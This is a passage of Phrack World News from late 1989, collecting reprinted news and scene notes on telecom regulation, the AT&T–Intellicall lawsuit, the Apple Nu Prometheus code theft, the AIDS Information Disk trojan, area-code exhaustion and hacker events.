Terrorist" (01/08/89) PWN XXIII..Part 1 "Mitnick Plea Bargains" (03/16/89) PWN XXV....Part 1 "Mitnick Plea Bargain Rejected As Too Lenient" (04/25/89) PWN XXVII..Part 1 "Computer Hacker Working On Another Plea Bargain" (05/06/89) PWN XXVII..Part 1 "Mitnick Update" (05/10/89) PWN XXVII..Part 1 "Kenneth Siani Speaks Out About Kevin Mitnick" (05/23/89) PWN XXVII..Part 1 "Judge Suggests Computer Hacker Undergo Counseling"(07/17/89) PWN XXVIII.Part 1 "Authorities Backed Away From Original Allegations"(07/23/89) PWN XXVIII.Part 1 "Judge Proposes Comm. Service For Hacker's Accomp."(10/13/89) PWN XXX....Part 1 _______________________________________________________________________________ Chaos Communications Congress ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Terra of the Chaos Computer Club On December 27-29, 1989 is the Chaos Communication Congress at Eidelstaedter Buergerhaus, Hamburg, West Germany. The topics of this Congress include: - The new German PTT law - Discussion about Copyright and Freedom of Information act - Women and Computers - Mailbox and other Networks (Zerberus, InterEuNet, UUCP) - Workshops for East and West German people to build networks between the two countries. - Discussion between Professor Klaus Brunnstein and CCC members about the problems of viruses and worms. - Workshops about Unix and UUCP for beginners, advanced, and special people - Presswork in a special room - Workshop Cyberbrain or Cyberpunk - Workshop and Discussion about Secure Networks (Special: TeleTrust, coding mixed gateways) The prices to enter the Congress are 33 DM for Normal people 23 DM for CCC-members 53 DM for Press Regards, Terra _______________________________________________________________________________ Phonavision At The University of California October 15, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Taken From the New York Times CALIFORNIA -- Students at two campuses of the University of California, at Berkeley and Los Angeles, have become the test market for a new public video-telephone booth called Phonavision. Its developers claim that it is the world's first video telephone for the general public. Each of the campuses has one of the large, silver-color phone booths in its student union. Phonavision opened on October 9, for a week of free demonstrations. Starting October 16, video phone calls from one campus to the other will cost $10 for three minutes. "We view all this semester as a test," said Stephen Strickland, chief executive officer of the Los Angeles-based company, Communications Technologies, that developed the video phones. "We want to be sure that when we do go to market with this service, it's as good as it can be." "We feel we're probably six months to a year away from having a system that we can go out and market," Strickland said. "I see them in airport lobbies, hotel lobbies, shopping centers, indoor high-traffic locations." Video telephones are already widely used in business, he added. Phonavision callers speak to each other on standard telephone receivers. A snapshot-size image of their own face is projected on one half of a small screen, and the other half shows a picture of the person to whom they are talking. As a caller talks, the video screen shows small movements of the mouth or face. But sudden movements mean a distorted picture. With a tilt of a caller's head, for example, the image will move to the side in separate parts, starting with the top of the head and moving down in a wavelike motion. Annalee Andres, a sophomore from Santa Ana, California, who has not yet selected a major, was one of the first students to try out Berkeley's new video phone. She and her friends crowded around the phone booth in the Martin Luther King Jr. Student Center, taking turns talking to a student from UCLA. "I think it has a long way to go yet, but it's really cool," she said. "I can really see where it's leading." Ms. Andres speculated on the effects that widespread use of video phones would have. "What if they catch you and you're just out of the shower?" she asked. "It'll change dating." Daniel Ciruli, a junior from Tucson, Arizona, majoring in computer science, was enthusiastic about his trial session, but he said the fee would keep him away in the future. "It's a new toy," he said. "But at $10 for three minutes, with only one other Phonavision, it's not going to be something that students are beating down the door to use." The video phone booth offers other services: Recording and dealing in videotapes and a place to send and receive fax messages. The booth accepts $1, $5, $10 and $20 bills, as well as Mastercard and Visa. Gary Li, a senior from Beijing, who is majoring in electrical engineering, started setting up Berkeley's phone booth in April. Since then he has spent about 20 hours a week repairing kinks in the system. Berkeley and UCLA were chosen as tryout spots for the new service because most students know somebody at the other campus, said Strickland, the company's chief executive. "That's a place where we can get novelty use," he said, adding that "Berkeley and UCLA have a reputation for being front-runner schools -- places that are innovative, that like new technology." Strickland said his company has spent almost three years developing Phonavision. He would not disclose total costs, but priced the video phone booths at $50,000 each. _______________________________________________________________________________ The Omnipresent Telephone October 10, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~ Taken from The New York Times Whatever the psychological implications, new technology has clearly made the phone more omnipresent. More calls are generated because of answering machines, now owned by 28 percent of the nation's households, according to the Electronic Industries Association. People who use them say they make and receive more calls because of them. "In olden days you would just miss the call," said Michael Beglin, a businessman in Nashville. Jill Goodman, an art dealer in New York, says she talks on the phone so often that "I'm tortured about it, teased and insulted." She uses the phone to socialize, shop and check in with people she wants to stay in touch with but does not want to take the time to see. "I have two lines in the country, two lines at home in the city and three lines in my office, if that gives you any idea of how much phone I can generate," she said. A month ago, after resisting initially, she decided to have a car phone installed. "I thought it might be nice to have a couple of hours without being reachable," she said. "But I didn't like not being able to reach when I wanted to." Increasingly, too, people are using the phone to get services, information and products. The 900 numbers, which require callers to pay the cost, and the 800 numbers, paid for by the calls' recipients, are growing quickly. Sprint Gateways started a new 900 service in May that already has 250 lines. Callers can get wrestling trivia, financial updates, real-estate information and a host of other data. They can even play a version of "Family Feud," which receives as many as 7,000 calls a day, said Adrian Toader, the director of sales and marketing. Telephone shopping through 800 numbers continues to grow, too. In 1986, L.L. Bean, the Freeport, Maine, retailer, received 60 percent of its orders by telephone and 40 percent by mail; by 1988, telephone orders had risen to 70 percent. Like an increasing number of retailers, L.L. Bean allows customers to call in their orders 24 hours a day. But callers to 800 numbers often want more than a new shirt or sweater. Susan Dilworth, who takes telephone orders for L.L. Bean, said, "A lot of people call and say: 'I'm coming to New England for the first time. How should I dress?'" Other callers order merchandise but then begin talking about their personal lives. "I think they're lonely," Mrs. Dilworth said. Indeed, these anonymous but personal contacts are so popular that some people are becoming hooked. Marilyn Ng-A-Qui, the acting executive director of the New York City Self-Help Clearinghouse, said one man called looking for help because he had run up a $5,000 bill calling 900 numbers. "It is emerging as a problem all over the country," she said. Despite the deluge of telephone conversation, there are holdouts. Lois Korey, a partner in a New York advertising agency, writes letters whenever she can, often suggesting lunch meetings. "I really like to see who I'm talking to," she said. But even her partner, Allen Kay, calls her from his office just four feet away. The only time he could not telephone, Mrs. Korey said, was when he was in his car. And now those days are over. "He got a car phone a month ago, and he calls all the time," she said. "When I sit in the front seat of his car, I try to step on it." _______________________________________________________________________________ Higher Phone Rates For Modem Users November 26, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (Material gathered from an Apple digest on Usenet) A new regulation that the FCC is quietly working on will directly affect you as the user of a computer and modem. The FCC proposes that users of modems should pay extra charges for use of the public telephone network which carry their data. In addition, computer network services such as CompuServe, Tymnet, & Telenet would also be charged as much as $6.00 per hour per user for use of the public telephone network. These charges would very likely be passed on to the subscribers. The money is to be collected and given to the telephone company in an effort to raise funds lost to deregulation. Jim Eason of KGO newstalk radio (San Francisco, California) commented on the proposal during his afternoon radio program during which, he said he learned of the new legislation in an article in the New York Times. Jim took the time to gather the addresses which are given below. It is important that you act now. The bureaucrats already have it in there mind that modem users should subsidize the phone company and are now listening to public comment. Please stand up and make it clear that we will not stand for any government restriction on the free exchange of information. The people to write to about this situation are: Chairman of the FCC 1919 M Street N.W. Washington, D.C. 20554 Chairman, Senate Communication Subcommittee SH-227 Hart Building Washington, D.C. 20510 Chairman, House Telecommunication Subcommittee B-331 Rayburn Building Washington, D.C. 20515 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Here is a sample letter: Dear Sir, Please allow me to express my displeasure with the FCC proposal which would authorize a surcharge for the use of modems on the telephone network. This regulation is nothing less than an attempt to restrict the free exchange of information among the growing number of computer users. Calls placed using modems require no special telephone company equipment, and users of modems pay the phone company for use of the network in the form of a monthly bill. In short, a modem call is the same as a voice call and therefore should not be subject to any additional regulation. _______________________________________________________________________________ FCC Orders Refunds to Long-Distance Companies November 30, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Taken from Associated Press WASHINGTON -- Local telephone companies may have to refund as much as $75 million to long-distance companies and large private-line business customers, the Federal Communications Commission says. Pacific Northwest Bell in Idaho is one of the 15 companies named. The local phone companies accumulated overcharges between 1985 and 1988 under FCC guidelines that allowed prices of these high capacity private-line services to exceed the phone companies' costs of providing the services. The FCC ordered a refund as it considered challenges to the special pricing scheme, which the local phone companies provide for long-distance companies or large business customers. The commission voted 4-0 that the scheme was legal during the 1985-88 period, when the high prices were designed to keep too many customers from switching from the regular public network to private lines, but that market conditions no longer justify continuation of the special pricing. The commission said it expects the local phone companies to refrain from requesting such special prices in the future. While examining the challenges to the special pricing scheme, the commission said it found that local phone companies in some cases had charged more than allowed under the commission's guidelines. Therefore, the companies must refund those charges, which could amount to as much as $75 million, the commission said. The FCC said the amount of the refunds will not be known until the local phone companies file detailed reports with the commission. The companies have 40 days to make their filings. The companies found not to be in compliance with the commission's pricing guidelines from October 1, 1985 to December 31, 1986 were: - Diamond State - South Central Bell in Alabama - Southwestern Bell in Missouri and Oklahoma - Northwestern Bell in Iowa, Minnesota, Nebraska, and North Dakota - Pacific Northwest Bell in Idaho Pacific Northwest Bell is now called U.S. West Communications and is the phone company that serves most Seattle-area residents. Companies found not complying from January 1, 1987 to December 31, 1988 were: - Ohio Bell - Wisconsin Bell - Southern Bell in North Carolina and South Carolina - South Central Bell in Mississippi and Tennessee - Pacific Bell - Nevada Bell - Southwestern Bell - Mountain Bell - Northwestern Bell - Cincinnati Bell _______________________________________________________________________________ AT&T v. Intellicall: Another Lawsuit November 8, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Dallas -- AT&T filed a lawsuit charging that a Texas-based corporation equips its pay telephones to illegally obtain billing information owned by AT&T. The lawsuit asks for $2 million in punitive damages and an undetermined amount in actual damages from Intellicall Inc., headquartered in Carrollton, Texas. It also asks the U.S. District Court in Dallas to order Intellicall to stop its unauthorized use of AT&T billing information. At issue is how Intellicall pay phones determine the validity of calling card numbers for billing purposes. AT&T contends that Intellicall pay phones are designed and programmed by Intellicall to reach into and obtain the information directly from AT&T's card validation system. That system, called Billing Validation Application (BVA), is a part of AT&T's network facilities. Before AT&T completes a call that will be charged to an AT&T Card, its validation system verifies that the number provided by the customer is currently valid. Based on contractual arrangements made before the 1984 breakup of the Bell System, regional Bell telephone companies also use the validation system. AT&T does not permit competitors such as Intellicall to use the system because the system was built by AT&T and contains valuable competitive information. AT&T alleges that when callers use an AT&T Card or Bell company calling card at an Intellicall pay phone, the pay phone automatically places a separate call through AT&T or local Bell facilities to a pre-programmed telephone number so that AT&T's validation system will automatically check the card number. If the card number is valid, the Intellicall pay phone then puts through the original customer call. "As a result of these practices," the lawsuit says, "Intellicall surreptitiously and without authorization obtains validation data from AT&T, obtains fraud control for calls by its customers without having to invest in fraud control facilities or otherwise purchase fraud control services, imposes costs on AT&T, and... obtains an unfair advantage over its competitors providing pay telephone and/or long-distance service, including AT&T." Although AT&T does not authorize other companies to accept the AT&T Card and does not permit competitors to use its validation system, the lawsuit notes that Intellicall could purchase validation services for Bell company calling cards from other companies. AT&T said it notified Intellicall that it was violating AT&T's proprietary rights and gave Intellicall every reasonable opportunity to halt the fraudulent validation practice. Only after Intellicall persisted in its unfair practices did AT&T decide to take legal action. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - AT&T v. Intellicall: The Lawsuit Is Over November 13, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Dallas -- AT&T and Intellicall, Inc. today announced the settlement of a lawsuit filed by AT&T against Intellicall, seeking damages and an injunction. AT&T had accused Intellicall of unauthorized access to AT&T's calling card validation system. The settlement also covered potential counterclaims which Intellicall intended to file against AT&T. In the agreement, Intellicall acknowledged AT&T's proprietary rights in the Billing Validation Application system, and agreed to make modifications in its licensed pay telephone software to safeguard against unauthorized access and use of the AT&T system. The terms of the agreement include an undisclosed payment by Intellicall to AT&T to contribute to the establishment of a compliance program which will permit AT&T to monitor unauthorized access to its billing systems. "AT&T is pleased that a settlement recognizing AT&T's proprietary right to the validation system was reached so quickly," said Gerald Hines, director of AT&T Card Services. _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 30, File #12 of 12 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN P h r a c k W o r l d N e w s PWN PWN ~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~ PWN PWN Issue XXX/Part 2 PWN PWN PWN PWN Created, Written, and Edited PWN PWN by Knight Lightning PWN PWN PWN PWN Special Thanks to Dark OverLord PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN U.S. Inquiry Into Theft From Apple November 19, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by John Markoff (New York Times) A former Apple Computer Inc. engineer has said he was served with a grand jury subpeona and told by an FBI agent that he is a suspect in a theft of software used by the company to design its Macintosh computer. In June a group identifying itself as the Nu Prometheus League mailed copies of computer disks containing the software to several trade magazines and software developers. Grady Ward, age 38, who worked for Apple until January (1989), said that he received the subpeona from an FBI agent, who identified himself as Steven E. Cook. Ward said the agent told him that he was one of five suspects drawn from a computerized list of people who had access to the material. The agent said the five were considered the most likely to have taken the software. A spokesman for the FBI in San Francisco said the agency would not comment on a continuing investigation. Ward said he had told the FBI he was innocent but would cooperate with the investigation. The theft of Apple's software has drawn a great deal of attention in Silicon Valley, where technology and trade-secret cases have highlighted the crucial role of skilled technical workers and the degree to which corporations depend on their talents. The case is unusual because the theft was apparently undertaken for philosophical reasons and not for personal profit. There is no indication of how many copies of the program were sent by Nu Prometheus. Software experts have said the programs would be useful to a company trying to copy the distinctive appearance of the Macintosh display, but it would not solve legal problems inherent in attempting to sell such a computer. Apple has successfully prevented many imitators from selling copies of its Apple II and Macintosh computers. The disks were accompanied by a letter that said in part: "Our objective at Apple is to distribute everything that prevents other manufacturers from creating legal copies of the Macintosh. As an organization, the Nu Prometheus League has no ambition beyond seeing the genius of a few Apple employees benefit the entire world." The group said it had taken its name from the Greek god who stole fire from the gods and gave it to man. The letter said the action was partially in response to Apple's pending suit against Microsoft Corp. and Hewlett-Packard Co., accusing them of copying the "look and feel" -- the screen appearance -- of the Macintosh. Many technology experts in Silicon Valley believe Apple does not have special rights to its Macintosh technology because most of the features of the computer are copied from research originally done at Xerox Corp.'s Palo Alto Research Center during the 1970s. The Macintosh was not introduced until 1984. The theft came to light in June after Macweek, a trade magazine, published the letter from Nu Prometheus. At the time the theft was reported, executives at Apple, based in Cupertino, California, said they took the incident seriously. A spokeswoman said that Apple would not comment on details of the investigation. Ward said he had been told by the FBI agent that the agency believed Toshiba Corp. had obtained a copy of the software and that copies of the program had reached the Soviet Union. The software is not restricted from export to the Communist bloc. Its main value is commercial as an aid in copying Apple's technology. Ward said the FBI agent would not tell him how it believed Toshiba had obtained a copy of the software. Ward also said the FBI agent told him that a computer programmer had taken a copy of the software to the Soviet Union. Ward said the FBI agent told him he was considered a suspect because he was a "computer hacker," had gone to a liberal college and had studied briefly at the Massachusetts Institute of Technology's Artificial Intelligence Laboratory. The term "hacker" was first used at MIT to describe young programmers and hardware designers who mastered the first interactive computers in the 1960s. Ward is the second person to be interviewed by the FBI in the investigation of the theft. Earlier Charles Farnham, a businessman in San Jose, California, said two FBI agents came to his office, but identified themselves as reporters for United Press International. Farnham, a Macintosh enthusiast, has disclosed information about unannounced Apple products, said that after asking him to come outside his office, the men said they were FBI agents and proceeded to question him about Nu Prometheus group. He said he was not told that he was a suspect in the case. UPI has complained to the FBI because of the incident. Ward said he had joined Apple in 1979 and left last January to start his own company, Illumind. He sells computerized dictionaries used as spelling checkers and pronunciation guides. He said the FBI told him that one person who had been mailed a copy of the Apple software was Mitchell Kapor, founder of Lotus Development Corporation. Kapor returned his copy of the disk unopened, Ward said the agent told him. Ward said the FBI had also said he was suspect because he had founded a group for the gifted known as Cincinnatus, which the agent said had roots in Greek mythology that were similar to the Nu Prometheus group. Ward said the FBI was mistaken, and Cincinnatus is a reference from ancient Roman history, not Greek mythology. _______________________________________________________________________________ Data-Destroying Disc Sent To European Computer Users December 13, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by John Markoff (New York Times) A computer disk containing a destructive program known as a Trojan horse has been mailed to computer users in at least four European countries. It was not clear if any copies of the program had been mailed to people in the United States. The program, which threatens to destroy data unless a user pays a license fee to a fictitious company in Panama City, Panama, may be a widespread attempt to vandalize thousands of personal computers, several computer experts who have studied the program said Tuesday, December 12. Some computer experts said the disk was mailed by a "PC Cyborg" company to subscribers of personal computer trade magazines, apparently using mailing lists. The disk is professionally packaged and accompanied by a brochure that describes it as an "Aids Information Disk," the computer experts said. But when it is installed in the user's computer it changes several files and hides secret programs that later destroy data on the computer disk. Paul Holbrook, a spokesman for the Computer Emergency Response Team, a U.S. government-financed security organization in Pittsburgh, said his group had confirmed the existence of the program, but did not know how widely it had spread. Trojan horses are programs hidden in software that secretly insert themselves in a computer when the software masking them is activated. They are different from other secret programs like viruses and worms because they are not infectious: They do not automatically copy themselves. A licensing agreement that accompanies the disk contains threatening information. It reads in part: "In case of your breach of this license, PC Cyborg reserves the right to take any legal action necessary to recover any outstanding debts payable to the PC Cyborg Corporation and to use program mechanisms to ensure termination of your use of these programs. The mechanisms will adversely affect other programs on your microcomputer." When it destroys data, the program places a message on the screen that asks users to send $387 to a Panama City address. John McAfee, a computer security consultant in Santa Clara, California, said the program had been mailed to people in England, West Germany, France and Italy. _______________________________________________________________________________ The Executive Computer: From Espionage To Using A Printer October 27, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Peter H. Lewis (New York Times) Those executives who pay attention to computers are more likely to worry about grand issues like productivity and small ones like how to make their personal printers handle envelopes than whether the KGB has penetrated their companies. In a fresh crop of books, they will find lessons on all these matters. Perhaps the most entertaining of the new books is "The Cuckoo's Egg" ($19.95, Doubleday), by Dr. Clifford Stoll, an astronomer. Because he was the rookie in the Lawrence Berkeley Laboratories in California, he was asked to track down and fix a glitch in the lab's accounting software, which had found a 75-cent discrepancy when it tried to balance the books. "First-degree robbery, huh?" was Stoll's first reaction. But by the time he was done nearly a year later, he had uncovered a West German spy ring that had cracked the security of American military and research computer networks, gathering information that it sold to Moscow. Beyond the entertainment value of this cat-and-mouse hunt, the book has lessons for any corporate computer user. The message is clear: Most companies are irresponsible about security. The ease with which the "hacker" penetrated even military installations was astonishing, but not as astonishing as the lack of concern by many of the victims. "The Cuckoo's Egg" follows the hunt for the unknown intruder, who steals without taking and threatens lives without touching, using only a computer keyboard and the telephone system. The detective is an eccentric who sleeps under his desk, prefers bicycles to cars, and suddenly finds himself working with the Federal Bureau of Investigation, the Central Intelligence Agency and the National Security Agency. Although the criminal and the hunter deal in the esoteric realm of computer code and data encryption, Stoll makes the technology accessible. He also discovers that navigating the global electronic grid is less difficult than navigating the bureaucracies of various government agencies. And while he was a whiz at tracing the cuckoo's electronic tracks from Berkeley to Okinawa to Hannover, West Germany, Stoll reveals himself to be helplessly lost on streets and highways and befuddled by such appliances as a microwave oven. Besides the more than 30 academic, military and private government installations that were easy prey for the spies, the victims included Unisys, TRW, SRI International, the Mitre Corporation and Bolt Beranek & Newman Inc. -- some of the very companies that design, build and test computer systems for the government. "No doubt about it, the shoemaker's kids are running around barefoot," Stoll writes. One leading character in the book is Dr. Bob Morris, chief scientist for the National Security Agency and the inventor of the security for the Unix operating system. An epilogue to the book, dealing with an unrelated computer crime, recounts the discovery that it was Morris's son who wrote the rogue program that shut down a national network for several days last year. In "The Macintosh Way" ($19.95, Scott, Foresman & Co.), Guy Kawasaki, a former Apple Computer Inc. executive who is now president of a software company, has written a candid guide about management at high-technology companies. Although his book is intended for those who make and market computer goods, it could prove helpful to anyone who manages a business. _______________________________________________________________________________ Dialing Away U.S. Area Codes November 13, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Laure O'Brien (Telephony Magazine) The current endangered species in the news may not be an animal at all. The number of available area codes in the United States is dwindling rapidly. Chicago consumed a new code on November 11, 1989 and and New Jersey will gobble up another one on January 1, 1990. There are only nine codes left, and they are expected to be used up by 1995, said Robert McAlesse, North American Numbering Plan administrator and member of Bellcore's technical staff. "In 1947 (Bellcore) started with 86 codes, and they projected exhaustion in 100 to 150 years. They were off by a few years," McAlesse said. When the 152 available codes are exhausted, Bellcore will use a new plan for creating area codes. A total of 138 codes already are assigned. Five of the remaining 14 codes are reserved for service access codes, and 9 are for geographic area codes. Under the current plan, a 0 or a 1 is used as the second digit while the first and last digits can range between 2 and 9. Under the new plan the first digit will be between 2 and 9 and the following two digits will be numbers between 0 and 9, McAlesse said. The new plan will create 640 potential area codes, he said. Bellcore isn't predicting when the newly created codes will run out. "The growth in new services and increase in the number of telephones are exhausting the codes. The biggest increases are cellular telephones, pagers, facsimile machines and new services that can have more than one number," McAlesse said. The current unassigned codes include 210, 310, 410, 706, 810, 905, 909, 910 and 917. The Chicago area took the 708 code, and New Jersey will take 908. In the Chicago metropolitan area, the suburbs were switched from the 312 area code to the new 708 code. Residents and businesses within the city limits retained the 312 code. Illinois Bell started preparing for the change two years ago with the announcements alerting business customers to change stationary and business cards, said Gloria Pope, an Illinois Bell spokeswoman. Now the telco is targeting the residential market with billboard reminders and billing inserts. The cost of technically preparing for the new code, including labor, is expected to reach $15 million. But Pope said that does not include mailings, public relations efforts and business packages designed to smooth out the transition. The telco will absorb the cost with budgeted funds, and no rate increase is expected, she said. Modifying the network to recognize the new code started about six months ago with translation work. Every central office in the Chicago Metropolitan area was adapted with a new foreign-area translator to accept the new code and route the calls correctly, said Audrey Brooks, area manager-Chicago translations. The long distance carriers were ready for the code's debut. AT&T, US Sprint and MCI changed their computer systems to recognize the new code before the Chicago deadline. "We are anticipating a pretty smooth transfer," said Karen Rayl, U.S. Sprint spokeswoman. Businesses will need to adjust their PBX software, according to AT&T technical specialist Craig Hoopman. "This could affect virtually every nationwide PBX," he said. Modern PBX's will take about 15 minutes to adjust while older switches could take four hours. In many cases, customers can make the changes themselves, he said. _______________________________________________________________________________ A New Coating Thwarts Chip Pirates November 7, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by John Markoff (New York Times) Several years ago, clever high-technology pirates removed a chip from a satellite-television descrambling device made by General Instrument Corporation, electronically siphoned out hidden decryption software and studied it to figure out a way to receive clear TV signals. When the company later tried to protect the chips by coating them with epoxy, the pirates simply developed a solvent to remove the protective seal, and stole the software again. Now government researchers at Lawrence Livermore National Laboratory, a weapons and energy research center in Livermore, California, have developed a special coating that protects the chip from attempts to pry out either the chip design or the information it contains. In the semiconductor industry, a competitor's chip design can be copied through a process called reverse engineering, which might include determining the design through an electron microscope or by dissolving successive layers of the chip with a solvent. Already a number of government military and intelligence agencies are using the coating to protect circuits containing secure information. The government has qualified 13 U.S. chip makers to apply the coating to chips used by certain government agencies. The Lawrence Livermore research, known as the Connoisseur Project, has developed a resin about the consistency of peanut butter that is injected into the cavity surrounding the chip after it has been manufactured. The coating is heated and cured; The chip is then sealed with a protective lid. The special protective resin is opaque and resists solvents, heat, grinding and other techniques that have been developed for reverse engineering. A second-generation coating is being developed that will automatically destroy the chip when an attempt is made chemically to break through the protective layer. Another project at the laboratory is exploring even more advanced protection methods that will insert ultra-thin screens between the layers of a chip, making it harder to be penetrated. ______________________________________________________________________________ U.S. Firm Gets Hungarian Telephone Contract December 5, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Taken from the St. Louis Post-Dispatch (via New York Times News Service) U.S. West Inc., one of the seven regional Bell telephone companies, announced that it had signed an agreement with Hungary to build a mobile cellular telephone system in Budapest. The Hungarian cellular system will be the first such telephone network in Eastern Europe. Because of the shortage of telephones in their country, Hungarians are expected to use cellular telephones for basic home service, as well as mobile communications. For Hungary and the other Eastern European countries that have antiquated telephone systems, it will be faster and cheaper for the Government to deliver telephone service by cellular networks than it would be to rebuild the nation's entire telephone apparatus. A cellular telephone network transmits calls on radio waves to small receiving antennas, called "cell" sites, that relay calls to local phone systems. The system to be built in Hungary will transmit calls from cellular phone to cellular phone and through the existing land-based telephone network. The system, which is scheduled to begin operation in the first quarter of 1991, will initially provide cellular communications to Budapest's 2.1 million residents. Eventually, the system will serve all of Hungary, a nation of 10.6 million. Hungary has 6.8 telephone lines for every 100 people, according to The World's Telephones, a statistical compilation produced by AT&T. By comparison, the US has 48.1 lines for every 100 people. _____________________________________________________________________________ 1. Phone Fun (November/December) -- Some students at Columbia University in New York City have added a twist to that ancient annoyance, the chain letter. The students have taken advantage of the school's newly installed, $15 million IBM/Rolm phone system's ability not only to store messages like an answering machine, but also to take and receive messages and send them -- with comments -- to a third party. Last spring, brothers Anil and Ajay Dubey, both seniors, recorded a parody of rapper Tone Loc's Top 10 single "Funky Cold Medina" and sent it to some buddies. Their friends then passed the recording along with comments, to some other pals, who passed it on to other friends... and so on, and so on, and so on. Eventually, the message ran more than ten minutes and proved so popular that the phone mail system became overloaded and was forced to shut down. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 2. Get a "Sprint" VISA Card Today (November 14, 1989) -- U.S. Sprint will begin mailing in December, a a Sprint VISA card, which will combine the functionality of a long distance calling card, a credit card and an ATM card. Sprint will market the card which will be issued by State Street Bank and Trust, in Boston. Business travelers will receive a single bill that list all their travel related expenses: Hotel, meals and phone calls. While payment for the phone charges will be done through the regular Visa bill, call detail reports will appear on Sprint's standard FONcard bill. Taken from Communications Week. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 3. The Harpers Forum -- Harpers Magazine came up with an idea for how to gather information about the phreak/hack modem community. They set up shop on The Well (a public access Unix and bulletin board) and invited any and all hackers to join in their multiple discussion subboards. The hackers involved were Acid Phreak, Bernie S., Cap'n Crunch, Cheshire Catalyst, Emmanuel Goldstein, Knight Lightning, Michael Synergy (of Reality Hackers Magazine), Phiber Optik, Piper, Sir Francis Drake, Taran King, and many old TAP subscribers. The Well is accessible through CompuServe's data network. All charges for using The Well by hackers were absorbed by Harpers. There were many people on The Well posing as hackers to try and add to the discussion, but it turns out that some of them like Adel Aide, were shoe salesmen. There were also a few security types, including Clifford Stoll (author of The Cuckoo's Egg), and a reporter or two like Katie Hafner (who writes a lot for Business Week). The contents of the discussion and all related materials will be used in an article in an upcoming issue of Harpers Magazine. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 4. Phrozen Ghost has supposedly been arrested for crimes relating to hacking, telecommunications fraud, and drugs. No other details are known at this time. Information sent to PWN by Captain Crook. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 5. SurveillanceCon '89 -- Tuc, Susan Thunder, and Prime Suspect all attended a Security/Surveillance Convention in Washington DC recently at which both Tuc and Susan Thunder gave presentations about computer security. Tuc's presentation dealt largely with bulletin boards like Ripco in Chicago and newsletters like Phrack Inc. Audio cassettes from all the speakers at this convention are available for $9.00 each, however we at PWN have no information about who to contact to purchase these recordings. _______________________________________________________________________________